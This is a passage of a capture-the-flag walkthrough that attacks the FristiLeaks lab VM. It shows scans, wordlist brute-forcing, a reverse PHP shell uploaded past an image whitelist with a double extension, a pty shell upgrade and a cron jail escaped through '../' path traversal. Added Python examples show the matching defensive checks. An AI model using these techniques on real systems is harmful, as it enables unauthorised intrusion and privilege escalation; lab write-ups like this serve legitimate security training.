“A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..” – Ar0xA
[note!!] VMware users will need to manually edit the VM’s MAC address to: 08:00:27:A5:A6:76
For more information and the OVA file download, please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.130/24)
Target: FristiLeaks: 1.3 (10.1.1.150/24)
Vulnerability & Exploit
There are no actual vulnerabilities to speak of; all you need to do to take down this VM is enumeration and more enumeration.
Create a customized dictionary and brute-force it to find hidden folders.
As usual, I use arp-scan to detect the target's IP address.
root@kali:~/fristileaks# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:fd:d1:6b VMware, Inc.
10.1.1.150 08:00:27:a5:a6:76 CADMUS COMPUTER SYSTEMS
10.1.1.254 00:50:56:e5:d1:58 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.661 seconds (96.20 hosts/sec). 4 responded
root@kali:~/fristileaks#
10.1.1.150 is our Target!
Then I run masscan to detect open ports on the target (masscan is much faster than nmap for a full port scan, so I use it for the full scan and then nmap for a deep scan of the ports it finds).
# Nmap 6.49BETA5 scan initiated Sun Dec 27 06:52:12 2015 as: nmap -sV -v -A -O -p 80 -oN 10.1.1.150_nmap.txt 10.1.1.150
Nmap scan report for 10.1.1.150
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 49.708 days (since Sat Nov 7 13:52:17 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 10.1.1.150
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 27 06:52:21 2015 -- 1 IP address (1 host up) scanned in 10.27 seconds
Based on the result, I noticed that robots.txt lists three folders:
/cola
/sisi
/beer
Also, from the Server response header, Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3, I know the target is running Apache 2.2.15, which is outdated, and the DAV/2 token suggests that WebDAV is enabled.
Meanwhile, I run nikto to scan for web vulnerabilities.
root@kali:~# nikto -host http://10.1.1.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.150
+ Target Hostname: 10.1.1.150
+ Target Port: 80
+ Start Time: 2015-12-27 06:53:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8330 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2015-12-27 06:53:38 (GMT-5) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The result only confirmed what we had already found; nothing new.
Then I visit the three folders one by one, but keep getting the same picture in response:
After trying dirbuster with several default wordlists and finding nothing, I decided to build a customized wordlist with cewl, containing all the words displayed in the web pages and images.
root@kali:~/fristileaks# cewl -v -d 2 -w cewl_dict_list.txt http://10.1.1.150/
root@kali:~/fristileaks# cat cewl_dict_list.txt
Ar0xA
meneer
quick
hackme
Welcome
Goal
get
UID
root
and
readthe
special
flag
file
Timeframe
should
doable
hours
The
fristileaks
motto
Fristileaks
2015
are
Fristleaks
barrebas
rikvduijn
wez3forsec
PyroBatNL
0xDUDE
annejanbrouwer
Sander2121
Reinierk
DearCharles
miamat
MisterXE
BasB
Dwight
Egeltje
pdersjant
tcp130x10
spierenburg
ielmatani
renepieters
Mystery
guest
uinix
WhatSecurity
mramsmeets
fristi
drink
keep
calm
Then I use wfuzz with that list to discover any hidden paths.
root@kali:~/fristileaks# wfuzz -c -z file,cewl_dict_list.txt --hc 404 http://10.1.1.150/FUZZ
********************************************************
* Wfuzz 2.0 - The Web Bruteforcer *
********************************************************
Target: http://10.1.1.150/FUZZ
Payload type: file,cewl.txt
Total requests: 54
==================================================================
ID Response Lines Word Chars Request
==================================================================
00051: C=301 7 L 20 W 233 Ch " - fristi"
root@kali:~/fristileaks#
From the result, one folder is found: fristi.
Visiting the newly found path http://10.1.1.150/fristi/, a login page appeared in my Firefox.
After trying some weak passwords, all of which failed, I found some clues in the source code.
The first is a comment written by eezeepz at the top of the code:
<html>
<head>
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
</head>
<body>
<center><h1> Welcome to #fristileaks admin portal</h1></center>
and another comment, a base64-encoded string, has been inserted at the very bottom of the source code:
Putting together all the information collected from this page and its source code, I guess the username is eezeepz and the password is keKkeKKeKKeKkEkkEk.
After logging in, I got a link that allows us to upload a file!
But when I tried to upload a .php webshell, I got the following error: only png, jpg and gif are allowed.
To bypass the whitelist check, I appended .jpg to the web shell's file name so that it looks like rsh.php.jpg.
rsh.php is a reverse PHP shell which connects back to my Kali's TCP port 5555, so before I upload and trigger the shell, I set up nc to listen on port 5555.
Ok, after uploading the reverse PHP shell, I can now visit it from the uploads folder; the URL is http://10.1.1.150/fristi/uploads/rsh.php.jpg.
Bingo! I got a shell now.
After enumeration I found sensitive database credentials stored in the file /var/www/html/fristi/checklogin.php: the username is eezeepz and the password is 4ll3maal12#.
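The bypass above works because the portal's whitelist only looks at how the file name ends, while the server still treats a name containing .php as PHP (that handler behaviour is my assumption about the VM). As an added example, my own code rather than the VM's upload handler, here is that suffix-only check next to a stricter validator; the magic-byte table and the random storage name are my additions.

```python
# Added example, not code from the FristiLeaks VM: the style of whitelist
# that rsh.php.jpg slips past, next to a stricter validator.
# Assumptions (mine): the portal only wanted png/jpg/gif, and the server
# executes any name containing a .php segment as PHP, so a double
# extension must be rejected outright rather than trusted by its suffix.
import os
import secrets
from typing import Optional

ALLOWED_EXT = {"png", "jpg", "gif"}

# Leading bytes of the three allowed image formats.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_is_allowed(filename: str) -> bool:
    """Suffix-only whitelist: accepts rsh.php.jpg because it ends in .jpg."""
    return any(filename.lower().endswith("." + ext) for ext in ALLOWED_EXT)


def strict_check(filename: str, content: bytes) -> Optional[str]:
    """Return the extension to store the file under, or None to reject.

    Rules: exactly one extension, that extension in the allow-list, and
    file content starting with the magic bytes of the claimed type.
    """
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    # "rsh.php.jpg" has two dots and ".htaccess" has an empty stem: reject both.
    if len(parts) != 2 or not parts[0]:
        return None
    ext = parts[1]
    if ext not in ALLOWED_EXT:
        return None
    if not content.startswith(IMAGE_MAGIC[ext]):
        return None
    return ext


def safe_storage_name(filename: str, content: bytes) -> Optional[str]:
    """Store under a random server-chosen name so the client never picks it."""
    ext = strict_check(filename, content)
    if ext is None:
        return None
    return secrets.token_hex(8) + "." + ext


if __name__ == "__main__":
    sample = b"<?php echo 'not an image'; ?>"  # constructed non-image upload
    print(weak_is_allowed("rsh.php.jpg"))      # True: the weak check passes it
    print(strict_check("rsh.php.jpg", sample))  # None: rejected
```

Even with this check, an uploads directory should sit outside the web root or have the script handler disabled, since valid image bytes can still be followed by PHP code.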
<?php
ob_start();
$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select database.
mysql_connect("$host","$username","$password") or die("cannot connect");
mysql_select_db("$db_name") or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
...truncated...
The first thing I thought of was to log in via SSH with the found username and password, but SSH is not running on the target server.
Then I tried the su command, but it has to be called from a TTY session. Using the trick python -c "import pty; pty.spawn('/bin/bash');" to get a TTY, I tried su again with the found credentials. Still failed; damn, the password is wrong.
sh-4.1$ python -c "import pty; pty.spawn('/bin/bash');"
python -c "import pty; pty.spawn('/bin/bash');"
bash-4.1$ su eezeepz
su eezeepz
Password: 4ll3maal12#
id
su: incorrect password
So I had to keep digging, and then I found a clue file, notes.txt, under /var/www/.
sh-4.1$ pwd
pwd
/var/www
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x. 6 root root 4096 Nov 17 13:50 .
drwxr-xr-x. 19 root root 4096 Nov 19 01:41 ..
drwxr-xr-x. 2 root root 4096 Aug 24 13:53 cgi-bin
drwxr-xr-x. 3 root root 4096 Nov 17 03:29 error
drwxr-xr-x. 7 root root 4096 Nov 25 04:10 html
drwxr-xr-x. 3 root root 4096 Nov 17 03:37 icons
-rw-r--r-- 1 root root 98 Nov 17 13:50 notes.txt
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
sh-4.1$
In that file, jerry mentions the home directory of user eezeepz. Following this clue, I checked the /home directory:
sh-4.1$ cd /home
cd /home
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root root 4096 Dec 27 17:50 ..
drwx------. 2 admin admin 4096 Nov 19 02:03 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 15:35 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 01:40 fristigod
sh-4.1$
As we can see above, the home folder eezeepz (drwx---r-x) is readable and executable by everyone else.
sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 15:35 .
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 09:40 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 12:40 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 12:40 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 12:40 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 09:40 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 09:40 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 09:49 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 09:49 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 09:49 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 09:49 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 09:49 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 09:48 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 09:49 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 09:48 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 09:48 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 09:49 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 09:49 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 09:48 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 09:49 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 09:49 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 09:48 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 09:49 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 09:49 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 09:49 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 09:49 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 09:49 kill
-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 09:49 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 09:49 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 09:49 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 09:49 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 09:49 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 09:49 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 09:49 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 09:49 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 09:49 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 09:49 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 14:53 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 09:49 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 09:49 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 09:49 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 09:49 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 09:49 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 09:49 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 09:49 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 09:49 true
-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 09:49 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 09:49 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 09:49 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 09:49 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 09:49 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 09:49 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 09:47 zic
sh-4.1$
Well, it really is a mess, but we can notice another notes.txt, which should contain more clues.
sh-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
sh-4.1$
Looks like I have to break out of jail via runthis. So I create the file runthis under /tmp, containing only one command, chmod 777 /home/admin, to change the permissions of /home/admin. However, after a couple of seconds of waiting, I got the error message: command did not start with /home/admin or /usr/bin.
bash-4.1$ cat /tmp/run
cat /tmp/runthis
chmod 777 /home/admin
bash-4.1$ cat /tmp/cron
cat /tmp/cronresult
command did not start with /home/admin or /usr/bin
Ok ok… so the command has to start with /home/admin or /usr/bin, so I modified the runthis file to /home/admin/../../bin/chmod -R 777 /home/admin, and after waiting a few seconds, /home/admin is now set to full permissions!
bash-4.1$ ls -al /home
ls -al /home
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root root 4096 Dec 27 17:50 ..
drwxrwxrwx. 2 admin admin 4096 Nov 19 02:03 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 15:35 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 01:40 fristigod
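Judging from the error message and from why the ../ trick works, the cron job only compares the text at the start of each line. As an added example, my own code rather than the VM's cronjob.py, here is that textual prefix test beside a version that normalises the path before deciding, so /home/admin/../../bin/chmod is judged as /bin/chmod; the directory names are the ones from notes.txt.

```python
# Added example, not the VM's cronjob.py: the prefix test that the
# cronresult error hints at, next to a check that normalises the path
# before comparing it. Assumption (mine): the real job compared the raw
# text of each line, which is why /home/admin/../../bin/chmod passed.
import os
import shlex

ALLOWED_DIRS = ("/home/admin", "/usr/bin")


def weak_allowed(command_line: str) -> bool:
    """Textual prefix check: fooled by '..' because it never looks at
    where the path actually leads."""
    return command_line.startswith(ALLOWED_DIRS)


def canonical_allowed(command_line: str, resolve=os.path.normpath) -> bool:
    """Resolve the binary's path, then require it to live inside an
    allowed directory.

    normpath collapses '.' and '..' lexically, which keeps this demo
    deterministic; on a live host pass resolve=os.path.realpath so that
    symlinks are followed as well.
    """
    try:
        argv = shlex.split(command_line)
    except ValueError:  # unbalanced quotes etc.
        return False
    if not argv:
        return False
    binary = resolve(argv[0])
    if not os.path.isabs(binary):  # relative names are never allowed
        return False
    for allowed in ALLOWED_DIRS:
        root = resolve(allowed)
        # commonpath compares whole components, so /home/adminx does not
        # match /home/admin the way a plain startswith would.
        if binary != root and os.path.commonpath([root, binary]) == root:
            return True
    return False


if __name__ == "__main__":
    line = "/home/admin/../../bin/chmod -R 777 /home/admin"
    print(weak_allowed(line))       # True: the text starts with /home/admin
    print(canonical_allowed(line))  # False: it really runs /bin/chmod
```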
Getting into /home/admin and enumerating, I found three suspicious files: cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt.
bash-4.1$ pwd
pwd
/home/admin
bash-4.1$ ls -al
ls -al
total 652
drwxrwxrwx. 2 admin admin 4096 Nov 19 02:03 .
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 12:40 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 12:40 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 12:40 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 13:42 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 14:14 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 14:48 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 15:21 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 15:20 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 13:49 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 13:40 echo
-rwxrwxrwx 1 admin admin 163600 Nov 18 13:42 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 13:42 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 13:41 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 01:47 whoisyourgodnow.txt
The file cryptedpass.txt contains the encrypted string mVGZ3O3omkJLmy2pcuTq, and the file cryptpass.py seems to be a crypto program whose process is
My best guess is that LetThereBeFristi! is the password of the user fristigod … and … Yes! I am fristigod now!
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin eezeepz fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -al
ls -al
total 20
drwx------ 2 fristigod fristigod 4096 Nov 19 01:40 .
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 ..
-rw-r--r-- 1 fristigod fristigod 18 Sep 22 12:40 .bash_logout
-rw-r--r-- 1 fristigod fristigod 176 Sep 22 12:40 .bash_profile
-rw-r--r-- 1 fristigod fristigod 124 Sep 22 12:40 .bashrc
bash-4.1$
After enumeration, I found something interesting:
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
After checking the file /var/fristigod/.secret_admin_stuff/doCom, I know this binary is owned by root and the setuid bit has been set (-rwsr-sr-x). It will allow people to run commands as ROOT.
bash-4.1$ ls -al /var/fristigod/.secret_admin_stuff/doCom
ls -al /var/fristigod/.secret_admin_stuff/doCom
-rwsr-sr-x 1 root root 7529 Nov 25 05:53 /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ strings /var/fristigod/.secret_admin_stuff/doCom
strings /var/fristigod/.secret_admin_stuff/doCom
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setuid
exit
strcat
stderr
system
getuid
fwrite
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
Nice try, but wrong user ;)
Usage: ./program_name terminal_command ...
bash-4.1$
But when I run the binary /var/fristigod/.secret_admin_stuff/doCom, I get a wrong user error message :(
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom
/var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)
bash-4.1$
After further enumeration… I finally got clues in /var/fristigod/.bash_history